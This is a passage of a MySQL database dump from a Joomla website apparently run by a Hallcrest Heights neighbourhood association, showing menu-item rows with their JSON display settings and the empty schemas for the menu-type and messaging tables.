00:00:00',0,1,'',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"3\",\"num_columns\":\"3\",\"num_links\":\"0\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Hallcrest Heights\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"Hallcrest Heights\",\"menu-meta_keywords\":\"Hallcrest Heights\",\"robots\":\"\",\"secure\":0}',41,42,1,'*',0),(114,'main','RSFormPro','rsformpro','','rsformpro','index.php?option=com_rsform','component',0,1,1,10003,0,'0000-00-00 00:00:00',0,1,'components/com_rsform/assets/images/rsformpro.gif',0,'',43,56,0,'',1),(115,'main','COM_RSFORM_MANAGE_FORMS','comrsformmanageforms','','rsformpro/comrsformmanageforms','index.php?option=com_rsform&task=forms.manage','component',0,114,2,10003,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',44,45,0,'',1),(116,'main','COM_RSFORM_MANAGE_SUBMISSIONS','comrsformmanagesubmissions','','rsformpro/comrsformmanagesubmissions','index.php?option=com_rsform&task=submissions.manage','component',0,114,2,10003,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',46,47,0,'',1),(117,'main','COM_RSFORM_CONFIGURATION','comrsformconfiguration','','rsformpro/comrsformconfiguration','index.php?option=com_rsform&task=configuration.edit','component',0,114,2,10003,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',48,49,0,'',1),(118,'main','COM_RSFORM_BACKUP_RESTORE','comrsformbackuprestore','','rsformpro/comrsformbackuprestore','index.php?option=com_rsform&task=backup.restore','component',0,114,2,10003,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',50,51,0,'',1),(119,'main','COM_RSFORM_UPDATES','comrsformupdates','','rsformpro/comrsformupdates','index.php?option=com_rsform&task=updates.manage','component',0,114,2,10003,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',52,53,0,'',1),(120,'main','COM_RSFORM_PLUGINS','comrsformplugins','','rsformpro/comrsformplugins','index.php?option=com_rsform&task=goto.plugins','component',0,114,2,10003,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',54,55,0,'',1),(155,'mainmenu','Community','community','','community','','heading',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',63,74,0,'*',0),(156,'mainmenu','Association','association','','association','','heading',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',75,82,0,'*',0),(158,'mainmenu','Interests','interests','','interests','index.php?option=com_content&view=category&layout=blog&id=9','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"0\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"5\",\"num_columns\":\"1\",\"num_links\":\"5\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"1\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',83,84,0,'*',0),(160,'side-menu','Announcements','announcements','','announcements','index.php?option=com_content&view=article&id=3','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',85,86,0,'*',0),(161,'side-menu','Events','events','','events','index.php?Itemid=','alias',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"aliasoptions\":\"178\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1}',87,88,0,'*',0),(162,'side-menu','Newsletters','newsletters','','newsletters','index.php?Itemid=','alias',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"aliasoptions\":\"181\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1}',89,90,0,'*',0),(166,'main','JCE','jce','','jce','index.php?option=com_jce','component',0,1,1,10009,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/logo.png',0,'',91,100,0,'',1),(167,'main','WF_MENU_CPANEL','wf-menu-cpanel','','jce/wf-menu-cpanel','index.php?option=com_jce','component',0,166,2,10009,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-cpanel.png',0,'',92,93,0,'',1),(168,'main','WF_MENU_CONFIG','wf-menu-config','','jce/wf-menu-config','index.php?option=com_jce&view=config','component',0,166,2,10009,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-config.png',0,'',94,95,0,'',1),(169,'main','WF_MENU_PROFILES','wf-menu-profiles','','jce/wf-menu-profiles','index.php?option=com_jce&view=profiles','component',0,166,2,10009,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-profiles.png',0,'',96,97,0,'',1),(170,'main','WF_MENU_INSTALL','wf-menu-install','','jce/wf-menu-install','index.php?option=com_jce&view=installer','component',0,166,2,10009,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/jce-install.png',0,'',98,99,0,'',1),(171,'main','COM_ALFCONTACT_MENU','com-alfcontact-menu','','com-alfcontact-menu','index.php?option=com_alfcontact','component',0,1,1,10028,0,'0000-00-00 00:00:00',0,1,'../media/com_alfcontact/images/alfcontact-16.png',0,'',101,102,0,'',1),(174,'mainmenu','Press','press','','community/press','index.php?option=com_content&view=category&layout=blog&id=7','component',0,155,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"1\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"5\",\"num_columns\":\"1\",\"num_links\":\"5\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"1\",\"show_readmore_title\":\"\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',64,65,0,'*',0),(175,'mainmenu','Contact Us','contactus','','contactus','index.php?option=com_alfcontact&view=alfcontact','component',0,1,1,10028,0,'0000-00-00 00:00:00',0,1,'',0,'{\"title\":\"\",\"defcontact\":\"3\",\"header\":\"\",\"footer\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',103,104,0,'*',0),(176,'mainmenu','Neighborhood Guide','neighborhood-guide','','community/neighborhood-guide','index.php?option=com_content&view=article&id=5','component',1,155,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',66,67,0,'*',0),(177,'mainmenu','Announcements','announcements','','community/announcements','index.php?option=com_content&view=article&id=3','component',1,155,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',68,69,0,'*',0),(178,'mainmenu','Events','events','','community/events','index.php?option=com_content&view=article&id=4','component',1,155,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',70,71,0,'*',0),(179,'mainmenu','About Us','about-us','','association/about-us','index.php?option=com_content&view=article&id=8','component',1,156,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',76,77,0,'*',0),(180,'mainmenu','Board Members','board-members','','association/board-members','index.php?option=com_content&view=article&id=9','component',1,156,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',78,79,0,'*',0),(181,'mainmenu','Newsletters','newsletters','','association/newsletters','index.php?option=com_content&view=category&layout=blog&id=8','component',1,156,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"1\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"5\",\"num_columns\":\"1\",\"num_links\":\"5\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"show_title\":\"use_article\",\"link_titles\":\"use_article\",\"show_intro\":\"use_article\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"use_article\",\"link_category\":\"use_article\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"1\",\"show_readmore_title\":\"\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',80,81,0,'*',0),(185,'main','COM_XMAP_TITLE','com-xmap-title','','com-xmap-title','index.php?option=com_xmap','component',0,1,1,10013,0,'0000-00-00 00:00:00',0,1,'components/com_xmap/images/xmap-favicon.png',0,'',105,106,0,'',1),(186,'footer','Site Map','site-map','','site-map','index.php?option=com_xmap&view=html&id=1','component',1,1,1,10013,0,'0000-00-00 00:00:00',0,1,'',0,'{\"include_css\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',107,108,0,'*',0),(187,'footer','Terms of Service','terms-of-service','','terms-of-service','index.php?option=com_content&view=article&id=13','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',109,110,0,'*',0),(188,'footer','Privacy Policy','privacy-policy','','privacy-policy','index.php?option=com_content&view=article&id=14','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',111,112,0,'*',0),(189,'main','COM_SIMPLECALENDAR','com-simplecalendar','','com-simplecalendar','index.php?option=com_simplecalendar','component',0,1,1,10043,0,'0000-00-00 00:00:00',0,1,'class:simplecalendar',0,'',113,124,0,'',1),(190,'main','COM_SIMPLECALENDAR_SUBMENU_CALENDAR','com-simplecalendar-submenu-calendar','','com-simplecalendar/com-simplecalendar-submenu-calendar','index.php?option=com_simplecalendar','component',0,189,2,10043,0,'0000-00-00 00:00:00',0,1,'class:simplecalendar',0,'',114,115,0,'',1),(191,'main','COM_SIMPLECALENDAR_SUBMENU_CATEGORIES','com-simplecalendar-submenu-categories','','com-simplecalendar/com-simplecalendar-submenu-categories','index.php?option=com_categories&extension=com_simplecalendar','component',0,189,2,10043,0,'0000-00-00 00:00:00',0,1,'class:simplecalendar-categories',0,'',116,117,0,'',1),(192,'main','COM_SIMPLECALENDAR_SUBMENU_ORGANIZERS','com-simplecalendar-submenu-organizers','','com-simplecalendar/com-simplecalendar-submenu-organizers','index.php?option=com_simplecalendar&view=organizers','component',0,189,2,10043,0,'0000-00-00 00:00:00',0,1,'class:simplecalendar-organizers',0,'',118,119,0,'',1),(193,'main','COM_SIMPLECALENDAR_SUBMENU_STATUSES','com-simplecalendar-submenu-statuses','','com-simplecalendar/com-simplecalendar-submenu-statuses','index.php?option=com_simplecalendar&view=statuses','component',0,189,2,10043,0,'0000-00-00 00:00:00',0,1,'class:simplecalendar-statuses',0,'',120,121,0,'',1),(194,'main','COM_SIMPLECALENDAR_SUBMENU_SETTINGS','com-simplecalendar-submenu-settings','','com-simplecalendar/com-simplecalendar-submenu-settings','index.php?option=com_config&com_config&view=component&component=com_simplecalendar','component',0,189,2,10043,0,'0000-00-00 00:00:00',0,1,'class:simplecalendar-settings',0,'',122,123,0,'',1),(195,'main','.XCloner-Backup and Restore','xcloner-backup-and-restore','','xcloner-backup-and-restore','index.php?option=com_xcloner-backupandrestore','component',0,1,1,10045,0,'0000-00-00 00:00:00',0,1,'components/com_xcloner-backupandrestore/images/xcloner.png',0,'',125,126,0,'',1),(196,'main','COM_ADMINTOOLS','com-admintools','','com-admintools','index.php?option=com_admintools','component',0,1,1,10046,0,'0000-00-00 00:00:00',0,1,'../media/com_admintools/images/admintools-16.png',0,'',127,128,0,'',1),(197,'main','COM_AKEEBA','com-akeeba','','com-akeeba','index.php?option=com_akeeba','component',0,1,1,10050,0,'0000-00-00 00:00:00',0,1,'../media/com_akeeba/icons/akeeba-16.png',0,'',129,130,0,'',1),(198,'mainmenu','Real Estate Guide','real-estate-guide','','community/real-estate-guide','index.php?option=com_content&view=article&id=17','component',1,155,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',72,73,0,'*',0),(199,'mainmenu','Survey','survey','','survey','index.php?option=com_content&view=article&id=18','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"2015 Survey\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',1,2,0,'*',0),(200,'main','com_postinstall','Post-installation messages','','Post-installation messages','index.php?option=com_postinstall','component',0,1,1,32,0,'0000-00-00 00:00:00',0,1,'class:postinstall',0,'',45,46,0,'*',1); /*!40000 ALTER TABLE `jos_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_menu_types` -- DROP TABLE IF EXISTS `jos_menu_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_menu_types` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `menutype` varchar(24) NOT NULL, `title` varchar(48) NOT NULL, `description` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`id`), UNIQUE KEY `idx_menutype` (`menutype`) ) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_menu_types` -- LOCK TABLES `jos_menu_types` WRITE; /*!40000 ALTER TABLE `jos_menu_types` DISABLE KEYS */; INSERT INTO `jos_menu_types` VALUES (1,'mainmenu','Main Menu','The main menu for the site'),(2,'side-menu','Side Menu',''),(5,'footer','Footer',''); /*!40000 ALTER TABLE `jos_menu_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_messages` -- DROP TABLE IF EXISTS `jos_messages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_messages` ( `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id_from` int(10) unsigned NOT NULL DEFAULT '0', `user_id_to` int(10) unsigned NOT NULL DEFAULT '0', `folder_id` tinyint(3) unsigned NOT NULL DEFAULT '0', `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `state` tinyint(1) NOT NULL DEFAULT '0', `priority` tinyint(1) unsigned NOT NULL DEFAULT '0', `subject` varchar(255) NOT NULL DEFAULT '', `message` text NOT NULL, PRIMARY KEY (`message_id`), KEY `useridto_state` (`user_id_to`,`state`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_messages` -- LOCK TABLES `jos_messages` WRITE; /*!40000 ALTER TABLE `jos_messages` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_messages_cfg` -- DROP TABLE IF EXISTS `jos_messages_cfg`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_messages_cfg` ( `user_id` int(10) unsigned NOT NULL DEFAULT '0', `cfg_name` varchar(100) NOT NULL DEFAULT '', `cfg_value` varchar(255) NOT NULL DEFAULT '', UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_messages_cfg` -- LOCK 